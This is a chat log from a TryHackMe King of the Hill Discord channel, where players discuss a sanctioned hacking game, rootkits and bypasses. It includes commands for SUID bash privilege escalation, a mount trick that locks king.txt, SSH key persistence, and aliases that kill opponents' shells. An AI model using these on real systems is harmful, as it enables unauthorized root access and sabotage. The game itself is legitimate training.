#koth
1 messages ยท Page 12 of 1
And you keep the rootkit for yourself haha๐

yup ive played koth for 1+ year, reported some players but only got replied by bots too
But i don't think it's because they don't care, it's just that mod resources are limited, they need to focus on other places
sup
That is the AD enumeration network of redteaming path damn one of the important part im itching and wanted to do it hands on but the network was broken and still broken till now.
Ending, i watched youtube then just take notes
oh rip, didn't look deep into messages
they're so much more active on discord, maybe try #site-support?
Nahh
Nay or Yay?
Nay lol
๐
Salute to the fallen soldier @opaque gull that being cooked by Ch1 now
Lmfao
๐ซก
we call those players "rookie killer" in games
bruh, i cant finish h1 easy medium hard
ill watch some videos
Do foothold and root in serv3
Also serv1 and 2
3 ways just pick
sorry im really bad, i need to watch videos lol
If you played with that Gladiuz i forgot his user God rank
Dont do ssh useless find another exploit lol
I forgot to screenshot ssh was error something "dangerous" thing lol i encountered him twice
u can simple found the password of root in a /var in this machine
In this video I explore 3 paths of the h1 medium koth machine (windows)
instagram : @matheuz_security
twitter: MatheuzSecurity
Discord: MatheuZ Security#8923 or MatheuZ Security#9282
My profile in THM: tryhackme.com/p/MatheuZSec
Join in the KoTH: tryhackme.com/games/koth
h1 medium
h1 medium is really cool, I don't know who created this box, but it's good
there should be more AD machines, that would be cool
thanks for this
Gave +1 Rep to @steep agate (current: #115 - 65)
i just need now to learn hard, lion machines, also food, theres still good videos on youtube
offically im addicted now to KOTH
nice
why we dont see you in koth last week
private with friends same you skills would be more fun
your*
I haven't played in a few months, and I also don't intend to play again, unless I have a new machine, or F11snipe does a stream/event.
good luck with that
yeah
There is only 1 write up in h1hard and no youtube
Im planning to make youtube on it but not now lol maybe next month
Yeah this add like 3 more windows machines would be fun
You literally invited people that is God in koth bro you're adding people in my threath list lol ๐
Just let them sleep we need to be good first in koth before they go back and play koth lol
if god would be practice and learning, if less would be competitve and fun
They've been playing since 2 yrs ago. We are new here bro ๐
you are very good bro, you can compete with them
overall rank doesn't say much about KOTH
I've beaten people with much higher levels in KOTH
easily
No lol ๐
Just stay where you are dont ever think to play koth
I might be playing soon to test the newest feature lol
*of my rootkit
@light flame ๐
Im still on practice in forensics and countering opponents king. As you see always i dont take the king rush like before lol
Unless you're in my threath list ๐
Lmk id like to test it out... See if it can be bypassed
any tips for h1 hard machine ? i tried to search on youtube but very long video
learn docker escape & xml injection u will find the way in
Is this even possible?
Sum of first hacked time and remaining time is greater than 1 hr
19:06 is your country time
@fossil helm
help
I am trying to do SQL injection in admin/login.php but its not working
how did you log in as admin?
You watch yt of h00dy in fireworks machine
Thanks
sorry @civic vortex just reseted mistakenly ๐
Do games usually expire as soon as they're scheduled to start?
Yeah, You have to wait a bit to get machine IP
That was a little weird ๐ okay thanks for letting me know
I think I saw you in one of the lobbies
I wanted to play it after a long time but I guess I will not enjoy it
Oh good it started
Damn tryhackme lol
Im about to finish their pentest path with just 3% unfinish in web fundamentals
sad
Now suddenly added web app pentesting
Yeah i guess i will be having more days and time doing pentest path + playing koth lol
Ya it's been a long time since playing so trying diff rootkit and also didn't care much about obfuscate stringing.
And what are new techniques going nowadays like i know the syscall one, interact is the one mount think.
@fossil helm you have ch1 rootkit sample ? Or know what he uses I just don't know about his rootkit ?
Matheuz put it there
I forgot to save jt
It
Try to scroll up you will see it
I mean here
No worries i ask matheuz
Ok bro ๐
i use to have f11snip's king rootkit that the og one
I wish i was playing wayback when they're still active
Maybe i will cry a lot ๐
I used to cried on ch1 rootkit month ago bro lol but now how koth works its all about advance techniques and forensics also you need to be fast
I talked to him; he will be back soon.
Just let them sleep bro dont call the old gods
Okay ๐
but which rootkit u was trying was of user space
@honest beacon
I know
is this normal on koth games?
chattr -i
Command Executed
___
.'o O'-._
/ O o_.-| /O_.-' O | | o o .-
jgs |o O_.-'
'--`
No cheese strats!
I remember a creator tampered the built-in chattr binary on a box
a lot of them using that
Just delete chattr and use your own lol
its an executable binary, you can run it from anywhere. Why put it in path where everyone can use it
that is intended in some boxes where if you execute the chattr thats there by default, then it will print that and exit.
So i have to submit mine or try another method?
you can just upload yours.
anyone playing koth?
Yeah
My 3rd time to encounter that 'dangerous' thing in ssh even though i had new id_rsa grabbed from ftp so i tried to reset it and yeah it worked
But i encountered that to that Gladiuz username twice.
God rank. in fireworks and food machine so i know i will not use ssh if that guy appears again.
@fallen palm man
I understand that you want to win but patch the machine only
Not deleting the domain lol
Now i will not give you a chance to step in the machine the next game i see your username ๐
@fallen palm
Reset for what?
Didn't change creds or patch
Come inside
lets play koth
lmfao
Talking about other platforms in chat or voice chat might get you banned be careful .
I enjoy playing htb battlegrounds, server siege or cyber mayhem
The game started 3 minutes ago... bro how are you king already?
@stiff egret - Might require your insights here ?
Get root on the machine as quickly as possible and run this sudo sysctl -w kernel.modules_disabled=1
lmao this guy closed all ports.
You can't use sysctl after ch1 loads your rootkit
His rootkit makes a hook in sysctl, i think
if you try to load another LKM after it loads your own, you will not be able to use insmod for example, to load lkm
it wasn't in 3 minutes
it was.
it gets root about 8 or 5 seconds after the machine starts
No.
ok
If you use common resources like chattr, chmod, etc., you won't win this match or you won't become king
already notified in advance
Are you in my game?
No, it's been a few months since I played koth
ok. So you dont know whats happening in my game.
So maybe just - let me ask staff about whats up
I know yes, I was the one who analyzed the ch1 rootkit, and did anti reversing on his rootkit, when someone took the sample and put it in the chat
You are a new player, you have a lot to learn
I am definately not.
strange, I never played against you
I mean, if you were a slightly older player you would know
this is one of the things that happens when you play with a player that also uses a rootkit
if you don't know
anyway, good luck xD
That technicom always shutting down machine if you dont disable the shutdown ๐
3 mins is slow bro
๐
I gave up doing this to ch1. Just let him play he is just maintaining his spot in 3 he will not play today
on all machines that have a rootkit compiled, he can root within 10 seconds after the machine starts
I was trying to explain this to @frank oracle but he wanted to be ignorant to someone who knows more than him, lol
@frank oracle is that you Rodrous?
he played only 4 games
and say this, lol
Me a month ago
Takes me a week to analyze it to my brain how koth works ๐คฃ
Yeah that's what it is anyways, there are 4 machines that ch1 doesn't care so still can win even if he is playing but most of the times the machines that is autowin for him comes out it's a 9/4 out of 13 machines
It's because on these machines it doesn't have a compiled rootkit, basically it already has the .ko (kernel object) compiled for these 9 machines, so you just have to get root as quickly as possible, and load it using insmod
You don't even need to compile it inside the machine, as it has already compiled the rootkit, so just be quick and load it
Maybe he did that because of that Technicom username shutting down machines if i were him i will do same way ๐
Yeah thank you for your explaininations for us beginners. Just remain sleep @steep agate and dont think of playing koth ok ๐คฃ
Gave +1 Rep to @steep agate (current: #112 - 66)
๐คฃ
Anyway, I don't intend to play koth again, I think I already said this here once, but only when I have new machines or f11snipe does a live stream
I'm still hoping for this who the heck doesn't want to play with the OG's ๐ฅ
I mean for now, because us a beginners is on our way to be good at koth before the OG's will comeback after koth changes and patch ๐
I think most of the players I played with stopped playing too
yeah there are some that are still playing but not always.
yeah
@knotty mica I uploaded a easy boot2root room few weeks back on thm, how can i collaborate that room with you guys and make it public or something..??
There is an option to make it public, onec it's public, it's placed in the QA queue to review it.
Yea, I have it set to public and it's still under submitted category
How much time it usually takes to be approved.?
As long as it takes, usually.
my room took around 4/5 months to be launched, it takes a long time, some people took 1 year to be launched, it really depends
Woah ๐ฎ
and on hackthebox it took about 6 months for my box to be released
Permx.?
yea
You will have to be very patient until it is released
Maybe, but I won't be able to do it today, I'm studying for a certificate
Sure brother, take your time and good luck for your certification too.
Here's my room: https://tryhackme.com/jr/privilegeplayground
nice
Btw which cert you going for.?
studying for CRTP, soon I will do CRTA, and I also already have the CRTO
Nice mam
yry my private room which have user space kit as well as lkm
basic one u will learn how to bypass simple rootkits: https://tryhackme.com/jr/meowmeow
you will get the flag if you bypass first rootkit user space user.txt second root.txt after lkm
best for beginners to learn abt rootkits
created by me
ldd /_/
no for lkm hehe
ldd not works for lkm
ldd used to list dependcies
try my room bro
there is intresting vuln. in web also
It works on user.txt
see code
hmm
try room u will get to know abt php filter chain
just transferred my vms and linux in my pc been doing thm in an old hdd laptop for about 3months that lagged always oftentimes hinders me in koth and thm paths lol
@rare pelican i feel the power surging in my hands been so long didnt use the pc lmfao
probs
skids
he resting it alot https://tryhackme.com/r/p/Jaydeep.Shirsath

probs in 1 v 1
he be like
how to retrieve my 76 streaks lol
i did just rest like 1day and half damn
fr
u can contact thm
i also used to do this alot lol XD
yeah im about to email lol
Which support page?
type of you will get a small circle in dashboard were u have to click to contact for streak recovery
Ah, it's the same thing, if staff don't answer it, it gets E-mailed anyway
it works bro i tried many times when i lost my streaks XD
No worries sister, I know it works.
Just completed it, nice room ๐
@fossil helm
how do you get points without flags
your graph keeps increasing (more than 6 times)
and also what is becoming king?
You gain points when you're King, I think every minute or so you gain some points. Becoming king is where you add your TryHackMe username in the /root directory, there is a file called king and you insert your name there.
good start to learn koth the rest is your own research keep learning
I had access to root, donkey, puss, etc but I didnโt know I could do that
anyone koth ??
Did you read the "How to play" section?
There is also an FAQ at the bottom of the page
This also has some useful information https://tryhackme.com/r/resources/blog/guide-to-king-of-the-hill
I scan ip but which ?
when this happens you should vote reset and a new ip will appear. Its a bug that happens every now and then.
edit the motd
did you use the bash exploit to elevate privileges
what it motd
message of the day
i set that suid ๐
so did you get king.txt
chmod +s /bin/bash
no was waiting for you to priv esc
id
how do you even disable that?
type id whats the output
check out https://gtfobins.github.io/gtfobins/bash/ on how to elevate your privileges
/bin/bash -p
i just did a chattr lock on king
@fossil helm ay u the guy who was on top this month on koth
im ur biggest fan
will u become my mentor? 
Im also a new learner bro.
It's just that other tough players are not playing that much
This might help you as a beginner guide
geez i had respect for u...
I just spam all ttys with nonsense and attr koth.txt lol
Dm
@odd quiver you need to do xwiki to get into foothold
Can someone please mentor me in koth I'm new
I'm very willing to learn anything
I do 100+ events per day
(Sometimes)
The TryHackMe Discord Server
@alpine quarry Refer to the following in order to send a message in this channel ^
Also for any koth related queries you may check the pinned messages like the following
I am thrilled to see blackdevil playing it's my firstime to see him play so im excited
but that idiot just ruined the game shutting it down lmfao
1 min king time
@nova tide he is been doing it since the day he played koth lol
Ik that can be disable shutdown reset poweroff command inside the machine but there are machines that it will not work
now he suddenly disappeared and didnt join the next game lol
He maybe filled with joy and partying announcing it to his neighbors 
my bruh used autopawn in food just to shutdown machine 
^
Just make an alias for those command that kills their shell or spams their terminal with /dev/urandom.... Especially if they are known for shutting down the machines ๐คท๐ผโโ๏ธ
nahh i just jdrop him lol
its just that i didnt expect it a while ago
because im waiting for devil
the prob also is in the spacejam machine bc he knows it only takes 5 secs to get root access ๐
i even won against ch1 because of him bc ik he will shutdown the machine so expecting all will reset and it would be a good race to ch1

i did this and killed port 3k now he's stucked outside
@leaden basin reset and bait me
i aint gonna buy that lol
good night guys im tired
I may start playing again randomly whenever I get some free time ๐
See all the new active players and organize a big tournament soon.
me as future audience ๐
team vs team?
We can try this... I was speaking to f11 and matheuz about this before and I think I know a way we can achieve this and make it fair for both teams.
i will play and find a team but im expecting i'll be cooked lol
they will also play?
The thing is one team would need to start a private match with their team mates and the "host"... Maybe 5-10 minutes to patch then we release the IP to the other team and how they score would be to put the "host" name as king .... Whoever has less time with the host name as king would win since they defended their machine the best ๐คท๐ผโโ๏ธ or maybe the other way around I don't know yet I'll have to think about it more
That way both teams could have a random machine, not know which machine they were Targeting, have to do some enumeration to know which machine they are playing etc... will make it a little bit harder.
We would need a host / referee that would be in both games I think f11 would be up for being the ref ๐คท๐ผโโ๏ธ i will talk with him soon and see if he would be interested in streaming this as well
That would be this year or next year?
We will probably have a tournament near the beginning of the new year. That way everyone can enjoy their holidays, spend time with friends and family, etc. Then start the streams back up
@rare pelican lezzzgawwwwwww and be cooked 
I see you climbing the leaderboards, you'll be fine
We may even do another tournament but with no rootkits ๐ make it fair for everyone playing, gives everyone a chance to win
im just spending my time because i will be in a new job this month so probably cannot play like this anymore lol
Yea that's what happened with me. That's why I'm not on much anymore but I may come back.
yeah i learned a lot here in koth and thm but with the experienced and old players i cant win
Playing against them will actually teach you more and help improve
i saw you defeat bravo and bravo always kicked my ass
After awhile it gets boring playing against ppl that can't beat you... Sure you rack up points but you are no longer learning
Yea playing against the top players made me figure out ways to bypass their rootkits... I looked at it like a challenge, now I like testing other people's rootkits because I know I can find a weak point
How i wish i was that good i read mtz's articles but still
I'm also partly responsible for ch1's rootkit being so strong because I helped him find those bypasses so he could fix the holes
Just takes some time and determination... Keep playing against the people that can beat you and eventually you will be able to beat them
my 1st week of playing koth my cheat sheet was mtz github then i used this to ch1
sudo lessecho USERNAME > /root/king.txt
sudo dd if=/dev/zero of=/dev/shm/root_f bs=1000 count=100
sudo mkfs.ext3 /dev/shm/root_f
sudo mkdir /dev/shm/sqashfs
sudo mount -o loop /dev/shm/root_f /dev/shm/sqashfs/
sudo chmod -R 777 /dev/shm/sqashfs/
sudo lessecho USERNAME > /dev/shm/sqashfs/king.txt
sudo mount -o ro,remount /dev/shm/sqashfs
sudo mount -o bind /dev/shm/sqashfs/king.txt /root/king.txt
sudo rm -rf /dev/shm/root_f
i bypass his rootkit
but they reseted the machine
after that he patched his rootkit lol
that time i dont have any idea who ch1 is
and he is using rootkit
i dont have idea i just follow what i read from mtz lmfao
yeah i keep this as advice
now he is just unstopable lol
you just created a monster @broken pilot
I got excited cuz I played a game last night and he was on, I wanted to test a new bypass on his rk but he left the game ๐ข
I know, sorry lol ๐
ch1's mind "Not today" 
i tried to experiment a own defense but @rare pelican just managed to bypassed it i thought it was already good because i used it frequently and win a lot lol he just saw what i did there i just pointing it in a folder and fire a loop lmfao
true you helped me very much to strengthen my rk but it was mostly @light flame he was always playing with me and every few days he finds a new bypass ๐คฃ and i have to fix it
mah g you here the whole time? or you've just rejoined the dc again
nah i just rejoined yesterday
@timber vale ๐ข
๐คฃ, we WILL play again....
@fossil helm let me try to bypass the kit you are using, jump in one of these games
already started... https://tryhackme.com/games/koth/join/3217d7353e1f7df32ca8243d
or starts in 15 ... https://tryhackme.com/games/koth/join/2ddf932d660d10286a6702ae
Oh ok next time just tag me i already slept a while ago
Mostly i dont use rk
I just used it when i know someone has it and in the lobby also
Or someone that i know has good forensic
i want you to use it though so i can see if i can beat it
You can i am sure ๐
My ch1 memories before when i cried a lot ๐คฃ๐ฅฒ
Does anyone here bother to make yt video in H1hard machine.
I noticed that a lot of players can't get foothold or root access to that machine.
I'm planning to make by this month after i finish this thm pentest/red paths.
I will do the same to the only 1 write up of h1hard machine that i found.
Xxe inject & docker container escape.
"if no one does"
i will create that video for h1:hard machine soon on yt : )
Ok your call
Or you will just let me? Since it is my first yt vid i wonder what it looks like lol ๐
Hey Thinktwice...
Hello KOTH players,
I Am facing a problem, as a root user i tried chattr, chmod, umount...echo taking input but not reflecting in king.txt
I am a noob in koth game.
I want to learn..
Please refer something, so that i can learn
Maybe your opponent is in defense mode already
If someone change port, how can I find the that port again?
Try to port scan again
Not found anything interesting
Oh you are king in this server
Where i am playing
Hey teach me how can i enter
@fossil helm
Machine has been reset you can now proceed
Hey KOTH pro players,
when someone run while loop for king.txt, how can I break it?
Find the process running the loop and kill it or if you know the loop is using something like chattr you could always chmod -x chattr or remove it
Hi guys i am new in koth
How to win against @timber vale he is not giving any chance to other players
You're new you can't win against him it's hard to explain but
For now don't play to win, play to learn explore the 13 machines take good notes
Hello! So my skills aren't quite well yet, and I wanted to ask should I try to play koth without much skills, or I gotta have solid understanding of things?
The thing is, I have never played koth before, and to be honest I don't even know what it is about, can't seem to find tutorial videos or something
So basically it's a multiplayer mode, where u have 2-10 players on a machine. You have to pwn the machine, get all the flags, patch the vulnerabilities, put ur username in /root/king.txt and defend it by doing a few tricks.
So to answer this message, u need a good understanding of linux systems and web pentesting 
Hello KOTH player,
can anyone explain what it means?
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
There is one machine where SUID binaries do not work, I don't know why though.
You could check out some of the live streams F11 done awhile back, they helped me get a understanding of king control and different techniques that could be used when I first started... https://www.youtube.com/live/wIDdrY-opPU?si=hOVfTS0p9u1k6taO
Playing KoTH and building cool tools & scripts!
OG's playing
Thanks you all for answering - @broken pilot , @violet zealot !
Gave +1 Rep to @broken pilot (current: #82 - 89)
I am going to check on those videos
It's because your shell session dont have full permission
Write your ssh public key to the user's .ssh/authorized_keys, then connect with SSH to get proper shell
Example scenario :
If KOTH ever comes out of beta we could really use a in game chat for the players who are not in the discord server... So we could at least tell them to reset the machine when it does this..
Can you DM the IP please?
Done, but i provided game links because IP never populated
I've reported this issue to the team. Thank you for your time.
Gave +1 Rep to @broken pilot (current: #82 - 90)
Yeah chat in the room while waiting
hi
Hi
hey guys, i was wondedring if loading LKM or eBPF programs, after being root, was allowed ?
It is, since it's not forbidden
And quite some players already use rootkits.
eBPF rootkit is good
I mean, if you want to load LKM, you'll have to be quick, because @timber vale rootkit also intercepts the use of sysctl/insmod so it's as if your LKM was sent to /dev/null
There are good pocs of eBPF rootkit, it's cool that you can also use eBPF for forensics
3 players obviously know all flows and hack every machine within 1min
https://tryhackme.com/games/koth/join/35c3e9065d011e31c6dbd235 if someone wants to explore in peace
ah ok i didn't catch earlier i can play alone in private room...
anyway thx
no it doesn't work...
Status: Completed
(Insufficient Players)
I'm almost done in thm pentester path 61% to their new path web pentest. While doing koth ๐
competing w no competition
I wonder if Offensive sec path is still relevant at this year?
I saw some rooms are 2 yrs ago
I want to learn basic and fundamentals from their platform before i move to other platform
I saw one of the OG @broken pilot didnt manage to bypass ch1 rootkit because ch1 already patched a lot in his rk so if master Trap had hard time what about us new learners we're cooked also ๐
I can still bypass it, I'm just not ready to expose this trick to him yet because he can and will patch it... I will eventually tho ๐... Doing some initial recon first...
It should be unpatchable
I can see mah G will be cook now
Lol I played u in some games
What should be unpatchable??
Thing is, I'm not creating rootkits to bypass rootkits... I'm doing it manually attacking the logic behind the rootkits... So once you realize what commands I'm running then you just hook those and I find something else ๐
That bypass is in mtz's write up? His detect lkm rootkit cheatsheet
One of my bypasses was showcased in one of matheuz writeups tho...๐
Alright i'm gonna read it again
But these other ones I'm still holding on to haven't been yet...
Like the symlink trick bypassed both read and write hooks on king... So then you just hook symlinks and now you need to find another one...
I encountered some players using symlinking to defend the king.
Did i just broke the rules if i disabled their way to symlinking? ๐
Like alias ln=
No that's easy to find and either remove the alias or create a new one...
Well I mean some players might complain, I guess it all depends on who you are playing against
Even if you removed symlink altogether, then I just bring a static compiled binary on to the machine...
There are some also adding txt files to root dir and link the original king to their user.
Some are hiding it lol
by encountering that i learned on their techniques
We should play a game sometime and I'll show u a few techniques ๐... U can try to stop them
Drop it already i will use it in some match ๐คฃ
No no no lol I'm taking my spot back soon ๐คฃ
Anyone can take my spot also i feel like i dont deserve that ๐คฃ
If OG's and other good players are active doing koth then they can just beamed me on that spot. I dont have plans also to replace bravo ik how skilled he is so i dont deserve to be in 4th also ๐
It's just that i have time doing koth these past months next year will be lessen like play a few in sat sun only ๐
It's fine lol I haven't had much time to play like I used too anymore. Just figured I'd pop in every now and again, try to help some of the newer players
Yeah i will make h1hard video to atleast help some other players in that machine.
That's a good start, I see a lot of players getting stuck escaping to the host machine
It makes it more fun when you have multiple players able to get on the machine at the same time....
If not then you are just wasting hours playing by yourself lol...
Yeah my problem in h1hard
I just echoed my user w/o defense then leave ๐ฅฒ๐
@broken pilot i know you can just beamed me in linux but in windows if we had a chance to play in same match in windows can you test my defense there
I suck at windows ngl but I'd be down cuz I need to stop procrastinating on windows lol
Ohh when i was in thm redteaming path that was the time i learned that windows is a huge topic to be in, good fundamentals and techniques i read ๐ i learned that this and this etc exists i vouch thm to that path ๐
Hopefully they will add more windows in koth add 3 so that will be 15 machines ๐
I mean I know some things in windows but I'm more comfortable with Linux..
I'm just still on my way in solidifying my knowledge in both linux and wndows ๐
How about this.. we play windows I try to beat your king defense, if I can't then you show me a few tricks.. Then we play Linux, you try to beat my king defense, if not I'll show you some tricks... Deal?
ad is life
I've been waiting for you to show me some tricks bro ๐. I keep putting it off from learning... I think I'm going to make it my mission for 2025 to become good at windows lol.
Especially since the majority of companies use windows and AD.. I can do some basic stuff but not fast at all ๐. I've been learning a little powershell here and there, need to create some good notes though
๐คฃ , practice a lot of AD
I really understand, in infra pentest for example, there will almost never be a Linux, depending on the company
Alright deal if will play in the same time
I know. I have a lab setup already I'm just being lazy to actually use it lol... Like I can get to DA on some machines but I want to learn more
I also learned that AD are used by the 90%+ of large corps, companies, orgs ๐ญ
I need to be a AD specialist ๐๐ฅ
I've been learning a bunch of cloud things lately... But it's mostly been Linux infra
What r u into now crte right?
Oh yes I understand, in xct's vulnlab you would learn a lot
yeaah, that's true
Most of the time there will be some EDR solution
in machines
Cloud is really cool, there are some jobs you can do with Linux on this side, one of them would be "linux security researcher"
I was talking to some people who have been working on this for a few days, it's really cool, they deal with a lot of malware for Linux, Yara rules, etc.
but there aren't many job openings, it's a very specific niche
CRTO*
I recently took the CRTA, now I intend to try to take the CRTP
I had a bug with KOTH while playing with a friend, i got access to the VM and put my name in the file (forgot the name of the file) but it didn't give me any points and it was my friend who was gettings points
this is why i don't hack anymore, too many sweats like dompriv
ya just for the win people just shutdown the box
they don't know how to play fair
no he pwoeroff the box
oh ok
nothing working for me ffs ha
yeah same
vote reset
done
still need 2 more
make sure u beat him niko
if the box don't get reset i win anyway
good ha
but its not about the win its about fair play
nah thats right but at least he dont get the points
ya
from cyberfare ? if so im currntly in CRTA
@faint path did the box just not work the entire 2nd half for you as well?
The exam is very simple, you can finish it in about 2/3 hours or so
Is that cert industry recognize in red teaming side?
I really have no idea, I saw some people on LinkedIn posting about this certification, but I did it just because it was on sale, I bought it for 10 dollars, so I just took advantage of it
Thm went off ๐ด
Ohh i see still available?
That promo 10$?
I just want to open thm to put a flag in web pentest flag and sleep so my streak will stay but it's down
Alright its back
It's nice to see a lot of players are playing koth now
@timber vale just continue to be inactive ๐คฃ
@south pulsar
Why you leave
I'm almost sure not, I got this promo a few months ago
Damn what org is crta
I see cyberwarfare
It's still 10$ if you use coupon
Nah doesn't matter to that "industry recognize" the important is the knowledge that we will gain ๐
Give me the coupon ๐ญ๐คก
I just tested the coupon I used, but it is no longer working ๐ฅฒ
Might be new coupon code now
@steep agate how many days you studied the course
In fact, I didn't see much about the course, I immediately went to schedule the exam
its still 10$
Serious? Can you send me the new coupon?
I used one but apparently the other doesn't work
hello everyone, nice to meet you. I was wondering if anyone had any problems with the production koth machine? When i use ftp to get id_rsa it just hangs. However, im able to get the other files like authorize_keys and flag.txt. Maybe im doing soemthing wrong? Any help is much appreciated!
i can see it says permission denied if using ftp -d "ip"
Did anyone listen to the theme song of the event!! ๐ฅ
ah same issue
and then asked me for the coupon
ok now i got the coupon, ill send you in pm
Who else uses autopawns here
Lets play now
I will try to match your autopawns with just my bare hands
I had a list of usernames using autopawns
Why you guys are so desperate huh ๐
Can you also dm that to me bro
Here as well ๐
Just one question, why?
Just try if my control c and v ability are fast than autopawn ๐
Imagine they're already had shell and will just do root while other players are just on their way to get foothold it's clearly unfair
๐
It is, hence private matches. Make a party do your match with group agreed upon rules.
Decentralised koth? ๐
Yeah sad, because it's their choice to get advantage
some 2-3 players used autopwns & just after they make king they delete every binaries from machine
kinda boring when you use auto the machine, enless if you can break his defense lol, thats why i switch to ctf and study for certifications
fr
Rootkit is not prohibited it's there already because there are ways to bypass it but using autopawns + lkm or userland ( ring3 ) is a greedy and a thirst for wins ๐
My first 2weeks playing koth i spent time to the machines enumerating it all reading a lot of write ups and koth tips and tricks. After that i found a formula on how to play it it's 456 ๐
Luckily i found some people like @rare pelican and @light flame who helped me understand what lkm's and userland.
Also i read what matheuz put in his channel about rootkits.
If you just play koth w/o doing other lessons then you're just wasting your time
I do koth as a side quest only im aiming all the red and pentest path of thm before i move to other platform
Koth is 24mins queue in the lobby and 1hr to play. Dont let that time consumed you if you got the king then move into another tab.
Or if there's a good player that you cannot bypass his defense then let it be.
can someone tell me what's problem here
name on king.txt is "khanakay" and on port 9999 it shows "amansaini"
Maybe he's using LD_PRELOAD or he did that trick of redirecting traffic from port 9999 to his host and leaving the king on his machine (which is against the rules and also more unlikely), maybe it's arnout's kingkit, idk
or else he just left his nickname in king.txt and when you visited port 9999 he changed his nickname in king
Cant load rk or userland in hogwarts
On all machines you can
Nah idk since i usually used manual defense unless the opponent has rk or userland
I see the dir there is no other txt been added
It might this
Well, if you are playing against ch1, loading lkm will not work, if you try to load LKM or ld_preload against other players it will work on any machine
Redirecting traffic from port 9999
I've played Hogwarts enough times to know this
Or he can just hide the original king and link it the user that he adds
You can still change the king.txt
But he will be still the king
That has nothing to do with it...
I didn't try such tricks in hogwarts since it's sensitive machine a lot of people handle that machine wrong
They throw some code lines of to def the king right away that cause error in the king and cannot create king anymore lol
I encounter a lot of that before when i just let them get the king first
When I played Koth, I saw players using dd to wipe the machine's memory after their names appeared as king. ๐
and then there was no space to create anything
Such a illegal trick ๐
And it's illegal, that would be against the rules
u have to stable ur shell then u will get access to load lol
in hogwarts
Best defense in hogwarts? Just get foothold and root within 1min max 2mins cuz i can just not let you in if im there already without breaking the rules ๐
Lol someone will be alrdy ready with his binary lolz
Imagine you guys put a lot of effort in koth ๐
The who ๐ฅฒ๐
is it still working, can u pls sahre if it is?
Probably not today.
No worries it's fixed now. Btw Merry Christmas, everyone.
does koth vc be any active?
i wonder
bruh my friend is pissing me off
we in a private game but he's deleting flags
๐ก
bro wana play games ima bout to scrape his python http server
Focus on becoming root and simply kick him out ๐
Hello
Well then @fossil helm , are you tired? ๐
Bravo is there im cooked
@mystic oxide i will just make it 1001 and stop playing for a moment im just making bravo as my shield for those aiming top 5 will face him first ๐
bravo is back
happy to see him
MDR devilxuser

yes
any spectate links ? ๐
why not participate directly?
@fossil helm bro why r u shutting the box services u shoudnt be doing so
in the worst case change the port dont shut them thats dirty play
Been working on this machine and man itโs pretty annoying finding auto scripts and random tools left in the userโs home directory
What are you talking about brother
Im not the only player lol
What match is that
Alright who are the other players
There are players there that has history of breaking rules
I will not tell it's up to you to find out
After getting king i dont do silly things and proceed reading paths in webapp pentest
So i dont care that much in the machine on what's going on ๐ฅฒ
Not until someone will dmed me so i will look at the history or processess
Alright i looked into history that slayerkkk did it lol
You can mention him here he cant deny i saw it a while ago i just let him do that lol
No need mate
lol @Jaydeep.Shirsath it cuts the ssh connection
No I don't
yes yes
normal look @fossil helm
@mystic oxide I got ssh port 65535
lol yes I know it's me who changed to 65535
This is tryhackme lol

Do i need VPN to access the koth?
yes
Or use the attackbox
https://tryhackme.com/games/koth/115363
here we all are stucked from 20-30 min there is no reset button also reflect all are stcuked here in this lobby expired for long time anyone pls check it out
it been a long minute of expiration
Yep same
Advance Happy New Year my THM friends, KoTH players and Everyone! ๐๐๐
Cheers ๐ฅ๐ท
Why the machine is showing scheduled for now like 30mins
https://tryhackme.com/games/koth/115370
Happy new year my bro
Yea same issue
That's why currently I am not playing
like is there something wrong with server or what?
Don't know
Same I will also then play later
Why the IP is not showing even if the game is running
https://tryhackme.com/games/koth/115370
I clicked but its saying "You have already requested for a reset"
U can only reset it one time one player
I left, today KOTH is not working
Happy new year guys
Happy new year Guysssss
same here
oh okayy
Happy new year
Same to you bro ๐
Happy new year
After almost 4 months finally finished while playing koth ๐
Just a small rant to thm atleast add points to walkthroughs? Look if someone finishes those path they're still in Omni rank ๐
Also i have some ctf rooms not related to that paths
@short tusk
i just did what it said

I mean if you finished those paths you should be atleast in
Wizzard rank
because the nose and the brain bleed is not that easy finishing those paths to someone a beginner like me

nice, me still learning
Can you stop resetting machine?
Nice!
I will also finish pentest+ and offsec since it was 45% and 71% after finishing that pentest paths.
Sryy brother
nice bro
Eheheh, this Koth guy seems popular :3
yes
why you always reset the box dont know how to play?
why do you use scripts to become root 5 seconds after the machine is started, what is the point?
i did manually
no script
ask @fossil helm he knows me i dont use scripts to get root
i devlop that speed on my own not script dont blame me
you don't even take the time to navigate in the ftp to retrieve the information etc... you have already saved everything, what's the point?
why would i when i alrdy saved the keys
every player did that to save time
infact thinktwice bravo everyone alrdy save it to save time
ah ok I don't understand the point but ok well done to you then
ready everything before match that's a thing
so you leave no chance for the beginner to have the king then.
learn to break
but well done to you, well done
ok

why are you trying to shutdown the machine?
316 shutdown
and make blocking rules in the firewall?
@rare pelican why : 250 ufw
251 iptables
252 iptables --show
253 iptables -h
i didnt
ig maybe @fair adder
he is doing
i am not doing anything in the machine
bro I am also not playing
GHOST
tryhackme rule number 1: The machine must not be made unavailable (shutdown/restart, firewall/iptables rules to stop all communication)
not me
but not me
I am not playing
i am not in the machine tho
lol well no it's nobody then LOL
same here
do u get from history
lol
u checking ur own
mdr no, history root
bro there u will capture ur own
i didnt do ssomthing to iptables tho
I don't even know how to use it
It doesn't matter at least you have the king only for you it doesn't matter, but I don't understand the point, even for you, it must not be fun to play alone.
then ask him @fossil helm
see koth is fun if player like some lkm users u will learn some good anlysis
or simply at least respect THM rule number 1
at least you have the king in 10 seconds, you are the best nice.
see i alrdy blocked shutdown why would i do that that doesnt make logic of urs?
& ur checking ur own root history tho bro
I'll come back later, good game
๐
Koth is funny
players do something wrong and then don't want to take the blame
[BIN: /usr/sbin/service] service ssh stop
[BIN: /usr/bin/basename] basename /usr/sbin/service
[BIN: /usr/bin/basename] basename /usr/sbin/service
[BIN: /bin/systemctl] systemctl --quiet is-active multi-user.target
[BIN: /bin/sh] sh /bin/systemctl --quiet is-active multi-user.target
[BIN: /bin/sed] sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p
[BIN: /bin/systemctl] systemctl list-unit-files --full --type=socket
[BIN: /bin/sh] sh /bin/systemctl list-unit-files --full --type=socket
[BIN: /usr/local/sbin/systemctl] systemctl stop ssh.service
[BIN: /usr/local/bin/systemctl] systemctl stop ssh.service
[BIN: /usr/sbin/systemctl] systemctl stop ssh.service
[BIN: /usr/bin/systemctl] systemctl stop ssh.service
